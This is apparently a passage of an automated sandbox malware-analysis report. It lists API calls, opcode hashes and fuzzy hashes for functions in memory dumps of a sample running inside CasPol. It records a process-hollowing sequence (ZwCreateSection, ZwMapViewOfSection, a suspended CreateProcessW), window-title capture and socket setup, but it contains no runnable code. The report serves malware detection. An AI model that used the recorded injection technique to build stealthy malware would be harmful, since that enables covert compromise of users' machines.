                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CodeInfoPageValid
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 546120528-0
                                                                                                                                                                          • Opcode ID: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                                                                                                                                          • Instruction ID: 1dd91d3823b6bb4934ca9945ee4913e93bf289da146d72ec34fd0236562290e4
                                                                                                                                                                          • Opcode Fuzzy Hash: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                                                                                                                                          • Instruction Fuzzy Hash: 91513474E043469EFB21CF71DC916BBBBE6EF49280F20807EE48687156D735DA458B90
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                                            • Part of subcall function 0044F0F7: _abort.LIBCMT ref: 0044F129
                                                                                                                                                                            • Part of subcall function 0044F0F7: _free.LIBCMT ref: 0044F15D
                                                                                                                                                                            • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                                                                                                                                                          • _free.LIBCMT ref: 0044F050
                                                                                                                                                                          • _free.LIBCMT ref: 0044F086
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorLast_abort
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2991157371-0
                                                                                                                                                                          • Opcode ID: 5c488e73cd7317a59bb91e94e032dcb6bf067ffc0982221c2c2ef85a747d1bec
                                                                                                                                                                          • Instruction ID: a9f826519387c1ac895116d2974c89b4af6d1f604a138ae73dd4863203302c4b
                                                                                                                                                                          • Opcode Fuzzy Hash: 5c488e73cd7317a59bb91e94e032dcb6bf067ffc0982221c2c2ef85a747d1bec
                                                                                                                                                                          • Instruction Fuzzy Hash: 2D31D371900104AFEB10EB69D441B9A77F4EF81325F2540AFE5049B2A3DB7A5D44CB58
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 10005AF6: GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                                                                                                            • Part of subcall function 10005AF6: _free.LIBCMT ref: 10005B2D
                                                                                                                                                                            • Part of subcall function 10005AF6: SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                                                                                                            • Part of subcall function 10005AF6: _abort.LIBCMT ref: 10005B74
                                                                                                                                                                            • Part of subcall function 10006D7E: _abort.LIBCMT ref: 10006DB0
                                                                                                                                                                            • Part of subcall function 10006D7E: _free.LIBCMT ref: 10006DE4
                                                                                                                                                                            • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                                                                                                                                          • _free.LIBCMT ref: 10006CD7
                                                                                                                                                                          • _free.LIBCMT ref: 10006D0D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorLast_abort
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2991157371-0
                                                                                                                                                                          • Opcode ID: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                                                                                                                                                          • Instruction ID: 62e76a57c0cb8018fa5258269fd2d3c97d0f5aa08c1c35bbbea2ca126a332e06
                                                                                                                                                                          • Opcode Fuzzy Hash: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                                                                                                                                                          • Instruction Fuzzy Hash: AB31D835904249AFF700CB69DD81B5D77F6EF493A0F3141A9E8049B295EB76AD40CB50
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367,00000000), ref: 004485AA
                                                                                                                                                                          • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004485B7
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2279764990-0
                                                                                                                                                                          • Opcode ID: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                                                                                                                                          • Instruction ID: be9fc4cf4793659cabcfb8eeb6b3f823a3a139bea871a56029073562aa2b3f0c
                                                                                                                                                                          • Opcode Fuzzy Hash: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                                                                                                                                          • Instruction Fuzzy Hash: 4B110637A00220BBFB229F1DDC4096F7395AB84364716866AFD19EB354DF34EC4186D9
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8,00000000), ref: 10005CA5
                                                                                                                                                                          • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 10005CB2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2279764990-0
                                                                                                                                                                          • Opcode ID: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                                                                                                                                          • Instruction ID: bece27fcde9612dcc576c905fc453b1e46dde912844247b60aafe4dc7e802519
                                                                                                                                                                          • Opcode Fuzzy Hash: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                                                                                                                                          • Instruction Fuzzy Hash: D0118F37A007259FFB26DE18DD9095B73E5EB843E17168220ED18AB258DA32EC0196A1
                                                                                                                                                                          APIs
                                                                                                                                                                          • _free.LIBCMT ref: 00446227
                                                                                                                                                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                                                          • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?,0000000F,00000000,00432F93,00000000,0000000F,0042F99D,?,?,00431A44,?,?,00000000), ref: 00446263
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocateHeap$_free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1482568997-0
                                                                                                                                                                          • Opcode ID: b10fa1e8472e683284d1f6c52ed4eb802d80ccb8cfc65d6c0dd02300a023487f
                                                                                                                                                                          • Instruction ID: 528349031ecf72c594af6ac828cc426c74ce8c7b4bfa82022820746e0f177899
                                                                                                                                                                          • Opcode Fuzzy Hash: b10fa1e8472e683284d1f6c52ed4eb802d80ccb8cfc65d6c0dd02300a023487f
                                                                                                                                                                          • Instruction Fuzzy Hash: 4CF0283110121176BB213B266C01B6B3759AF83B70B1700ABFC1466281CFBCCC41406F
                                                                                                                                                                          APIs
                                                                                                                                                                          • socket.WS2_32(00000002,00000001,00000006), ref: 00404852
                                                                                                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                                                                                                                                                            • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateEventStartupsocket
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1953588214-0
                                                                                                                                                                          • Opcode ID: 4d13770ae0ce35ce4dbd6fcc6f24a1261d6c2af77246669734211e402fddb5c6
                                                                                                                                                                          • Instruction ID: d30f6c82ceabff406a890a607b6903e59214fa94f63df9469096212d3e1caec2
                                                                                                                                                                          • Opcode Fuzzy Hash: 4d13770ae0ce35ce4dbd6fcc6f24a1261d6c2af77246669734211e402fddb5c6
                                                                                                                                                                          • Instruction Fuzzy Hash: F90171B1408B809ED7359F28A8456967FE0AB55304F044D6EF1DA97B92D3B5A881CB18
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                                                                                                                                                                          • Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
                                                                                                                                                                          • Opcode Fuzzy Hash: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                                                                                                                                                                          • Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D
                                                                                                                                                                          APIs
                                                                                                                                                                          • dllmain_crt_process_attach.LIBCMT ref: 10001F22
                                                                                                                                                                          • dllmain_crt_process_detach.LIBCMT ref: 10001F35
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: dllmain_crt_process_attachdllmain_crt_process_detach
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3750050125-0
                                                                                                                                                                          • Opcode ID: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                                                                                                                                          • Instruction ID: 876e10da87b92cf64c449b9c471687dd08192407587f6dd1e67cbf7e6a41b987
                                                                                                                                                                          • Opcode Fuzzy Hash: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                                                                                                                                          • Instruction Fuzzy Hash: A0E0D83646820BEAFB11EEB498156FD37D8EB011C1F100536B851C115ECB39EB90F121
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 0041BB49
                                                                                                                                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BB5C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$ForegroundText
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 29597999-0
                                                                                                                                                                          • Opcode ID: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                                                                                                                                                          • Instruction ID: 8c7c0eb369f00208a7459315ff6bb8442305c4ed6b2016914032ba092e23deac
                                                                                                                                                                          • Opcode Fuzzy Hash: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                                                                                                                                                          • Instruction Fuzzy Hash: 21E04875A00328A7E720A7A5AC4EFD5776C9708755F0001AEBA1CD61C2EDB4AD448BE5
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00438E14: try_get_function.LIBVCRUNTIME ref: 00438E29
                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A48A
                                                                                                                                                                          • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A495
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 806969131-0
                                                                                                                                                                          • Opcode ID: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
                                                                                                                                                                          • Instruction ID: eb5cae5cbee30b1ad319c652a9e61f9a188d1dba44d7e0681113cf8ff6ee03f7
                                                                                                                                                                          • Opcode Fuzzy Hash: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
                                                                                                                                                                          • Instruction Fuzzy Hash: 34D0A725584340141C04A279381B19A1348193A778F70725FF5A0C51D2EEDD4070512F
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 10003AF1: try_get_function.LIBVCRUNTIME ref: 10003B06
                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003906
                                                                                                                                                                          • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 10003911
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 806969131-0
                                                                                                                                                                          • Opcode ID: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                                                                                                                                                                          • Instruction ID: 7b09b9f0a56a55c342e0a0cde292dff0536b901afa775ab746cb2a45ce2dbbc5
                                                                                                                                                                          • Opcode Fuzzy Hash: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                                                                                                                                                                          • Instruction Fuzzy Hash: 50D0223A8087431CF80BC6BD2C67A8B23CCCB421F4360C2A6F7209A0CDEF60E0046322
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                                                                                                                                            • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                                                                                                                                            • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                                                                                                                                            • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                                                                                                                                            • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                                                                                                                                            • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                                                                                                                                            • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                                                                                                                                            • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                                                                                                                                            • Part of subcall function 0041812A: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                                                                                                                                            • Part of subcall function 0041812A: VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                                                                                                                                          • CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                                                                                                                                          • CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Handle$AddressModuleProc$Close$AllocCreateProcessVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2948481953-0
                                                                                                                                                                          • Opcode ID: 434d97dd539276bb1b15e641649fa57fd1217911ab9ffb100551eca57c0074db
                                                                                                                                                                          • Instruction ID: c73268819cb60d4ae5e82c4b87b0b0ed6d20300d6cd2269ac6e8254bb02e1260
                                                                                                                                                                          • Opcode Fuzzy Hash: 434d97dd539276bb1b15e641649fa57fd1217911ab9ffb100551eca57c0074db
                                                                                                                                                                          • Instruction Fuzzy Hash: 4FD05E76C4120CFFCB006BA4AC0E8AEB77CFB09211B50116AEC2442252AA369D188A64
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 3a029944d771eb8a1b2846a7b5ac2838134afd3be6a211902ab956b72bc11154
                                                                                                                                                                          • Instruction ID: 3af98ca860494c99acd04ebe2bb4cc6dc665ec8dea8eb108ba88c8789d347e54
                                                                                                                                                                          • Opcode Fuzzy Hash: 3a029944d771eb8a1b2846a7b5ac2838134afd3be6a211902ab956b72bc11154
                                                                                                                                                                          • Instruction Fuzzy Hash: 9411E3B27201019FD7149B18C860BA6B766FF50710F5942AAE256CB3B2DB35EC91CA98
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 176396367-0
                                                                                                                                                                          • Opcode ID: de129d127ca67ea1a753d85601f70d90f750fdfe4a2104a943af0387f97755ca
                                                                                                                                                                          • Instruction ID: d045c5f40cf3cd8d18dd0e016010c764e1ae3afdbf5b32035de166f485dbb4de
                                                                                                                                                                          • Opcode Fuzzy Hash: de129d127ca67ea1a753d85601f70d90f750fdfe4a2104a943af0387f97755ca
                                                                                                                                                                          • Instruction Fuzzy Hash: 681193319002059BCB15EF66E842AEE7BB5AF54314B10403FF446672E2EF78AD15CB98
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __alldvrm
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 65215352-0
                                                                                                                                                                          • Opcode ID: 0fb042ee673182d0a975c8eeaa188f9506240d203db94b7081741dab0a726564
                                                                                                                                                                          • Instruction ID: 3aa9a871bb282a4e2fa9f206226bba5a96c76ae51e783e445703a1682bb04715
                                                                                                                                                                          • Opcode Fuzzy Hash: 0fb042ee673182d0a975c8eeaa188f9506240d203db94b7081741dab0a726564
                                                                                                                                                                          • Instruction Fuzzy Hash: 51014CB2950308BFDB24EF64C902B6EBBECEB04328F10452FE445D7201C278AD40C75A
                                                                                                                                                                          APIs
                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044834A,00000001,00000364,?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000), ref: 00445BB5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                          • Opcode ID: ce26be8ca3846e5000c6f53c40b97d329a66d538f9906bf99632d42dae41b906
                                                                                                                                                                          • Instruction ID: ef76d3429b2572ee2e16b707a9c356192af24cfd4e901c13b73aaad13af6506a
                                                                                                                                                                          • Opcode Fuzzy Hash: ce26be8ca3846e5000c6f53c40b97d329a66d538f9906bf99632d42dae41b906
                                                                                                                                                                          • Instruction Fuzzy Hash: BEF0B431500F65ABBF222E22AC05E5B3769DB81770B14412BB914EA286CA38FC0186AC
                                                                                                                                                                          APIs
                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                          • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                                                                                                                          • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                                                                                                                                                                          • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                                                                                                                          • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF
                                                                                                                                                                          APIs
                                                                                                                                                                          • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
